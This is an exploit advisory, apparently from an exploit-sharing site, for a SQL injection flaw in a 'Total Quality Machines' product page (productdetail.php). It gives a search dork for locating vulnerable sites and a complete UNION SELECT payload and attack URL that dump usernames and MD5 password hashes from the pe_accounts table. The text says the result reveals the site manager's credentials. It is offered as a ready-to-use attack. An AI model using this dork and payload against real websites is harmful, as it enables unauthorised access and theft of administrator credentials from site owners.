##################################################################
Title : Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities
Discovered By: CrAzY CrAcKeR
Home : Null
date : 14/4/2012
d0rk:- "Total Quality Machines"
##################################################################
##################################################################
±±±±±±±±±±+
–+CrAzY CrAcKeR±-
±±±±±±±±±±+
##################################################################
##################################################################
Example:-
[-] http://www.???.com/productdetail.php?id=(sql)
[-] Injection code… ( -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts )
[-] http://www.???.com/productdetail.php?id=–1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts
[-] you see now password (md5) and the name of the site manager
####################################################################
Greeting to my friend A7eb Alwrd
####################################################################